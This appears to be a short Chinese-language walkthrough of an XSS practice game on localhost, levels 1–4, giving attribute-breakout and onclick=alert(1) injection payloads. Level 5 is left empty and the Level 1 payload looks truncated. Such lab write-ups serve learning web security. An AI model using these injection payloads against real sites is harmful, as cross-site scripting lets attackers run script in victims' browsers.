xss挑战之旅wp

 

Level 1  -  180831

第一关很简单,开胃菜

payload: http://localhost/xss_game/level1.php?name=test123

xss挑战之旅wp_第1张图片

 

Level 2  -  180831

找到两个思路:

payload: test123">#

xss挑战之旅wp_第2张图片

第一个点被转义了,但是第二个点正常。

只要能实现标签和引号闭合就可以了。

第二种思路是借鉴别人wp,通过onclick点击事件弹窗。

payload: " οnclick="alert(1)     

xss挑战之旅wp_第3张图片

 

Level 3  -  180901

这次使用的是单引号,和第二关思路相同

payload: ' οnclick='alert(1)

xss挑战之旅wp_第4张图片

 

 

Level 4  -  180901

和第三关差不多

payload: " οnclick="alert(1)

xss挑战之旅wp_第5张图片

 

Level 5  -  180901

你可能感兴趣的:(javascript,php)